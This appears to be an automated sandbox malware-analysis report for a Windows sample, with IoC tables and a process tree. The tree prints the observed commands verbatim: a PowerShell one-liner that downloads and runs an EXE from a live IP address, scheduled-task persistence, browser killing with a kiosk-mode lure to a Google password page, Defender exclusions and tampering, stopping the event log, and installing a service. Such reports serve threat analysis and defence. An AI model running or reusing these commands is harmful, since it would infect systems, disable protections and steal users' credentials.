pid Process 2208 powershell.exe 2208 powershell.exe 536 Temp9MDGV1BO6ZISXHPSXUPOWGBIHDVAAVJZ.EXE 536 Temp9MDGV1BO6ZISXHPSXUPOWGBIHDVAAVJZ.EXE 5032 rapes.exe 5032 rapes.exe 4684 6988727892.exe 4684 6988727892.exe 2256 rapes.exe 2256 rapes.exe 2152 20a66c7e87.exe 2152 20a66c7e87.exe 2152 20a66c7e87.exe 2152 20a66c7e87.exe 1464 b4727e7654.exe 1464 b4727e7654.exe 8 AhFKwnS.exe 8 AhFKwnS.exe 8 AhFKwnS.exe 8 AhFKwnS.exe 5356 InstallUtil.exe 5356 InstallUtil.exe 5356 InstallUtil.exe 5356 InstallUtil.exe 5792 445719b67a.exe 5792 445719b67a.exe 2300 9133893bdd.exe 2300 9133893bdd.exe 2300 9133893bdd.exe 2300 9133893bdd.exe 2300 9133893bdd.exe 2300 9133893bdd.exe 5132 9f85653241.exe 5132 9f85653241.exe 5508 rapes.exe 5508 rapes.exe 1360 S3QJ9ZRVCQEWMP1J3S.exe 1360 S3QJ9ZRVCQEWMP1J3S.exe 456 3dafbcc94d.exe 456 3dafbcc94d.exe 5680 de5df7d9f4.exe 5680 de5df7d9f4.exe 456 3dafbcc94d.exe 456 3dafbcc94d.exe 5680 de5df7d9f4.exe 5680 de5df7d9f4.exe 5680 de5df7d9f4.exe 4928 AhFKwnS.exe 4928 AhFKwnS.exe 4928 AhFKwnS.exe 4928 AhFKwnS.exe 5252 InstallUtil.exe 5252 InstallUtil.exe 5252 InstallUtil.exe 5252 InstallUtil.exe 1464 v6Oqdnc.exe 1464 v6Oqdnc.exe 1464 v6Oqdnc.exe 1464 v6Oqdnc.exe 1464 v6Oqdnc.exe 1464 v6Oqdnc.exe 6744 MCxU5Fj.exe 6744 MCxU5Fj.exe 6744 MCxU5Fj.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1372 SplashWin.exe -
Suspicious use of AdjustPrivilegeToken 34 IoCs
description pid Process Token: SeDebugPrivilege 2208 powershell.exe Token: SeDebugPrivilege 32 20a66c7e87.exe Token: SeDebugPrivilege 8 AhFKwnS.exe Token: SeDebugPrivilege 8 AhFKwnS.exe Token: SeDebugPrivilege 5488 taskkill.exe Token: SeDebugPrivilege 4908 taskkill.exe Token: SeDebugPrivilege 3256 taskkill.exe Token: SeDebugPrivilege 6060 taskkill.exe Token: SeDebugPrivilege 3564 taskkill.exe Token: SeDebugPrivilege 5952 firefox.exe Token: SeDebugPrivilege 5952 firefox.exe Token: SeDebugPrivilege 5680 de5df7d9f4.exe Token: SeDebugPrivilege 4928 AhFKwnS.exe Token: SeDebugPrivilege 4928 AhFKwnS.exe Token: SeDebugPrivilege 4740 powershell.exe Token: SeShutdownPrivilege 4816 powercfg.exe Token: SeCreatePagefilePrivilege 4816 powercfg.exe Token: SeShutdownPrivilege 5672 powercfg.exe Token: SeCreatePagefilePrivilege 5672 powercfg.exe Token: SeShutdownPrivilege 5636 powercfg.exe Token: SeCreatePagefilePrivilege 5636 powercfg.exe Token: SeShutdownPrivilege 3024 powercfg.exe Token: SeCreatePagefilePrivilege 3024 powercfg.exe Token: SeDebugPrivilege 5248 powershell.exe Token: SeLockMemoryPrivilege 6976 explorer.exe Token: SeShutdownPrivilege 6848 powercfg.exe Token: SeCreatePagefilePrivilege 6848 powercfg.exe Token: SeShutdownPrivilege 6868 powercfg.exe Token: SeCreatePagefilePrivilege 6868 powercfg.exe Token: SeShutdownPrivilege 6876 powercfg.exe Token: SeCreatePagefilePrivilege 6876 powercfg.exe Token: SeShutdownPrivilege 6860 powercfg.exe Token: SeCreatePagefilePrivilege 6860 powercfg.exe Token: SeDebugPrivilege 7092 ce4pMzk.exe -
Suspicious use of FindShellTrayWindow 36 IoCs
pid Process 3888 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe 3888 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe 3888 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe 456 3dafbcc94d.exe 456 3dafbcc94d.exe 456 3dafbcc94d.exe 456 3dafbcc94d.exe 456 3dafbcc94d.exe 456 3dafbcc94d.exe 456 3dafbcc94d.exe 456 3dafbcc94d.exe 456 3dafbcc94d.exe 5952 firefox.exe 5952 firefox.exe 5952 firefox.exe 5952 firefox.exe 5952 firefox.exe 5952 firefox.exe 5952 firefox.exe 5952 firefox.exe 5952 firefox.exe 5952 firefox.exe 5952 firefox.exe 5952 firefox.exe 5952 firefox.exe 5952 firefox.exe 5952 firefox.exe 5952 firefox.exe 5952 firefox.exe 5952 firefox.exe 5952 firefox.exe 5952 firefox.exe 5952 firefox.exe 456 3dafbcc94d.exe 456 3dafbcc94d.exe 456 3dafbcc94d.exe -
Suspicious use of SendNotifyMessage 35 IoCs
pid Process 3888 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe 3888 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe 3888 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe 456 3dafbcc94d.exe 456 3dafbcc94d.exe 456 3dafbcc94d.exe 456 3dafbcc94d.exe 456 3dafbcc94d.exe 456 3dafbcc94d.exe 456 3dafbcc94d.exe 456 3dafbcc94d.exe 456 3dafbcc94d.exe 5952 firefox.exe 5952 firefox.exe 5952 firefox.exe 5952 firefox.exe 5952 firefox.exe 5952 firefox.exe 5952 firefox.exe 5952 firefox.exe 5952 firefox.exe 5952 firefox.exe 5952 firefox.exe 5952 firefox.exe 5952 firefox.exe 5952 firefox.exe 5952 firefox.exe 5952 firefox.exe 5952 firefox.exe 5952 firefox.exe 5952 firefox.exe 5952 firefox.exe 456 3dafbcc94d.exe 456 3dafbcc94d.exe 456 3dafbcc94d.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 5952 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3888 wrote to memory of 4300 3888 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe 85 PID 3888 wrote to memory of 4300 3888 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe 85 PID 3888 wrote to memory of 4300 3888 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe 85 PID 3888 wrote to memory of 924 3888 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe 86 PID 3888 wrote to memory of 924 3888 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe 86 PID 3888 wrote to memory of 924 3888 44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe 86 PID 4300 wrote to memory of 5044 4300 cmd.exe 88 PID 4300 wrote to memory of 5044 4300 cmd.exe 88 PID 4300 wrote to memory of 5044 4300 cmd.exe 88 PID 924 wrote to memory of 2208 924 mshta.exe 90 PID 924 wrote to memory of 2208 924 mshta.exe 90 PID 924 wrote to memory of 2208 924 mshta.exe 90 PID 2208 wrote to memory of 536 2208 powershell.exe 94 PID 2208 wrote to memory of 536 2208 powershell.exe 94 PID 2208 wrote to memory of 536 2208 powershell.exe 94 PID 536 wrote to memory of 5032 536 Temp9MDGV1BO6ZISXHPSXUPOWGBIHDVAAVJZ.EXE 95 PID 536 wrote to memory of 5032 536 Temp9MDGV1BO6ZISXHPSXUPOWGBIHDVAAVJZ.EXE 95 PID 536 wrote to memory of 5032 536 Temp9MDGV1BO6ZISXHPSXUPOWGBIHDVAAVJZ.EXE 95 PID 5032 wrote to memory of 4684 5032 rapes.exe 103 PID 5032 wrote to memory of 4684 5032 rapes.exe 103 PID 5032 wrote to memory of 4684 5032 rapes.exe 103 PID 5032 wrote to memory of 32 5032 rapes.exe 105 PID 5032 wrote to memory of 32 5032 rapes.exe 105 PID 5032 wrote to memory of 32 5032 rapes.exe 105 PID 32 wrote to memory of 2152 32 20a66c7e87.exe 106 PID 32 wrote to memory of 2152 32 20a66c7e87.exe 106 PID 32 wrote to memory of 2152 32 20a66c7e87.exe 106 PID 32 wrote to memory of 2152 32 20a66c7e87.exe 106 PID 32 wrote to memory of 2152 32 20a66c7e87.exe 106 PID 32 wrote to memory of 2152 32 20a66c7e87.exe 106 PID 32 wrote to memory of 2152 32 20a66c7e87.exe 106 PID 32 wrote to memory of 2152 32 20a66c7e87.exe 106 PID 32 wrote to memory of 2152 32 20a66c7e87.exe 106 PID 4684 wrote to memory of 4924 4684 6988727892.exe 111 PID 4684 wrote to memory of 4924 4684 6988727892.exe 111 PID 4684 wrote to memory of 4924 4684 6988727892.exe 111 PID 4684 wrote to memory of 4924 4684 6988727892.exe 111 PID 4684 wrote to memory of 4924 4684 6988727892.exe 111 PID 4684 wrote to memory of 4924 4684 6988727892.exe 111 PID 4684 wrote to memory of 4924 4684 6988727892.exe 111 PID 4684 wrote to memory of 4924 4684 6988727892.exe 111 PID 4684 wrote to memory of 4924 4684 6988727892.exe 111 PID 4684 wrote to memory of 4924 4684 6988727892.exe 111 PID 5032 wrote to memory of 1464 5032 rapes.exe 112 PID 5032 wrote to memory of 1464 5032 rapes.exe 112 PID 5032 wrote to memory of 1464 5032 rapes.exe 112 PID 5032 wrote to memory of 8 5032 rapes.exe 117 PID 5032 wrote to memory of 8 5032 rapes.exe 117 PID 5032 wrote to memory of 8 5032 rapes.exe 117 PID 1464 wrote to memory of 5476 1464 b4727e7654.exe 118 PID 1464 wrote to memory of 5476 1464 b4727e7654.exe 118 PID 1464 wrote to memory of 5476 1464 b4727e7654.exe 118 PID 8 wrote to memory of 5356 8 AhFKwnS.exe 119 PID 8 wrote to memory of 5356 8 AhFKwnS.exe 119 PID 8 wrote to memory of 5356 8 AhFKwnS.exe 119 PID 8 wrote to memory of 5356 8 AhFKwnS.exe 119 PID 8 wrote to memory of 5356 8 AhFKwnS.exe 119 PID 8 wrote to memory of 5356 8 AhFKwnS.exe 119 PID 8 wrote to memory of 5356 8 AhFKwnS.exe 119 PID 8 wrote to memory of 5356 8 AhFKwnS.exe 119 PID 8 wrote to memory of 5356 8 AhFKwnS.exe 119 PID 1464 wrote to memory of 5476 1464 b4727e7654.exe 118 PID 1464 wrote to memory of 5476 1464 b4727e7654.exe 118 PID 1464 wrote to memory of 5476 1464 b4727e7654.exe 118 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3316
-
C:\Users\Admin\AppData\Local\Temp\44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe"C:\Users\Admin\AppData\Local\Temp\44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3888 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn gCLjbmabI3i /tr "mshta C:\Users\Admin\AppData\Local\Temp\rQw2foPtZ.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4300 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn gCLjbmabI3i /tr "mshta C:\Users\Admin\AppData\Local\Temp\rQw2foPtZ.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5044
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\rQw2foPtZ.hta3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:924 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'9MDGV1BO6ZISXHPSXUPOWGBIHDVAAVJZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2208 -
C:\Users\Admin\AppData\Local\Temp9MDGV1BO6ZISXHPSXUPOWGBIHDVAAVJZ.EXE"C:\Users\Admin\AppData\Local\Temp9MDGV1BO6ZISXHPSXUPOWGBIHDVAAVJZ.EXE"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:536 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5032 -
C:\Users\Admin\AppData\Local\Temp\10106150101\6988727892.exe"C:\Users\Admin\AppData\Local\Temp\10106150101\6988727892.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4684 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"8⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:4924
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106160101\20a66c7e87.exe"C:\Users\Admin\AppData\Local\Temp\10106160101\20a66c7e87.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:32 -
C:\Users\Admin\AppData\Local\Temp\10106160101\20a66c7e87.exe"C:\Users\Admin\AppData\Local\Temp\10106160101\20a66c7e87.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2152
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 32 -s 8008⤵
- Program crash
PID:4600
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106170101\b4727e7654.exe"C:\Users\Admin\AppData\Local\Temp\10106170101\b4727e7654.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1464 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"8⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:5476
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106180101\AhFKwnS.exe"C:\Users\Admin\AppData\Local\Temp\10106180101\AhFKwnS.exe"7⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:8
-
-
C:\Users\Admin\AppData\Local\Temp\10106200101\445719b67a.exe"C:\Users\Admin\AppData\Local\Temp\10106200101\445719b67a.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5792
-
-
C:\Users\Admin\AppData\Local\Temp\10106210101\9133893bdd.exe"C:\Users\Admin\AppData\Local\Temp\10106210101\9133893bdd.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2300 -
C:\Users\Admin\AppData\Local\Temp\S3QJ9ZRVCQEWMP1J3S.exe"C:\Users\Admin\AppData\Local\Temp\S3QJ9ZRVCQEWMP1J3S.exe"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1360
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106220101\9f85653241.exe"C:\Users\Admin\AppData\Local\Temp\10106220101\9f85653241.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5132
-
-
C:\Users\Admin\AppData\Local\Temp\10106230101\3dafbcc94d.exe"C:\Users\Admin\AppData\Local\Temp\10106230101\3dafbcc94d.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:456 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5488
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4908
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3256
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6060
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3564
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking8⤵PID:5920
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking9⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5952 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2032 -parentBuildID 20240401114208 -prefsHandle 1960 -prefMapHandle 1952 -prefsLen 27131 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2b6708c7-3792-419b-969f-1af404b442ea} 5952 "\\.\pipe\gecko-crash-server-pipe.5952" gpu10⤵PID:912
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2464 -parentBuildID 20240401114208 -prefsHandle 2444 -prefMapHandle 2432 -prefsLen 28051 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e6ca92e3-1caf-41b8-b3ae-50a04dc4c0c9} 5952 "\\.\pipe\gecko-crash-server-pipe.5952" socket10⤵PID:1920
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3152 -childID 1 -isForBrowser -prefsHandle 1516 -prefMapHandle 2800 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {501cc007-e2bf-4449-b80a-c2d435efe686} 5952 "\\.\pipe\gecko-crash-server-pipe.5952" tab10⤵PID:4500
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1236 -childID 2 -isForBrowser -prefsHandle 3972 -prefMapHandle 3968 -prefsLen 32541 -prefMapSize 244628 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1ad848b9-c1b3-43bc-a74e-93bb58ef10d9} 5952 "\\.\pipe\gecko-crash-server-pipe.5952" tab10⤵PID:4236
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4572 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4780 -prefMapHandle 4792 -prefsLen 32541 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {eca09ec7-5843-48fa-b3b7-5f477d4e11a5} 5952 "\\.\pipe\gecko-crash-server-pipe.5952" utility10⤵
- Checks processor information in registry
PID:836
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5156 -childID 3 -isForBrowser -prefsHandle 5148 -prefMapHandle 3828 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2daac9da-94e6-4410-b569-e687e8f3f6ea} 5952 "\\.\pipe\gecko-crash-server-pipe.5952" tab10⤵PID:2848
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5184 -childID 4 -isForBrowser -prefsHandle 5304 -prefMapHandle 5308 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6a1720ba-9adc-4c7d-bbe1-1e9c7dbfab63} 5952 "\\.\pipe\gecko-crash-server-pipe.5952" tab10⤵PID:5524
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5556 -childID 5 -isForBrowser -prefsHandle 5632 -prefMapHandle 5628 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {514f2256-a8b5-45af-81d0-4743f169e7b1} 5952 "\\.\pipe\gecko-crash-server-pipe.5952" tab10⤵PID:812
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106240101\de5df7d9f4.exe"C:\Users\Admin\AppData\Local\Temp\10106240101\de5df7d9f4.exe"7⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5680
-
-
C:\Users\Admin\AppData\Local\Temp\10106250101\AhFKwnS.exe"C:\Users\Admin\AppData\Local\Temp\10106250101\AhFKwnS.exe"7⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4928
-
-
C:\Users\Admin\AppData\Local\Temp\10106260101\v6Oqdnc.exe"C:\Users\Admin\AppData\Local\Temp\10106260101\v6Oqdnc.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1464
-
-
C:\Users\Admin\AppData\Local\Temp\10106270101\OEHBOHk.exe"C:\Users\Admin\AppData\Local\Temp\10106270101\OEHBOHk.exe"7⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:6240 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4740
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart8⤵PID:620
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart9⤵PID:636
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 08⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4816
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 08⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5672
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 08⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3024
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 08⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5636
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "DWENDQPG"8⤵
- Launches sc.exe
PID:2264
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "DWENDQPG" binpath= "C:\ProgramData\ztlktuiiawkf\ckonftponqgz.exe" start= "auto"8⤵
- Launches sc.exe
PID:2116
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog8⤵
- Launches sc.exe
PID:5600
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "DWENDQPG"8⤵
- Launches sc.exe
PID:3088
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106280101\MCxU5Fj.exe"C:\Users\Admin\AppData\Local\Temp\10106280101\MCxU5Fj.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:6640 -
C:\Users\Admin\AppData\Local\Temp\10106280101\MCxU5Fj.exe"C:\Users\Admin\AppData\Local\Temp\10106280101\MCxU5Fj.exe"8⤵
- Executes dropped EXE
PID:6720
-
-
C:\Users\Admin\AppData\Local\Temp\10106280101\MCxU5Fj.exe"C:\Users\Admin\AppData\Local\Temp\10106280101\MCxU5Fj.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6744
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6640 -s 7888⤵
- Program crash
PID:6836
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106290101\Y87Oyyz.exe"C:\Users\Admin\AppData\Local\Temp\10106290101\Y87Oyyz.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2388 -
C:\Windows\Temp\{5D1699EF-D116-49B6-A148-288D6312C99E}\.cr\Y87Oyyz.exe"C:\Windows\Temp\{5D1699EF-D116-49B6-A148-288D6312C99E}\.cr\Y87Oyyz.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\10106290101\Y87Oyyz.exe" -burn.filehandle.attached=540 -burn.filehandle.self=5488⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3452 -
C:\Windows\Temp\{4956A76E-DEB4-45ED-8D69-7E9A2D141050}\.ba\SplashWin.exeC:\Windows\Temp\{4956A76E-DEB4-45ED-8D69-7E9A2D141050}\.ba\SplashWin.exe9⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:5632 -
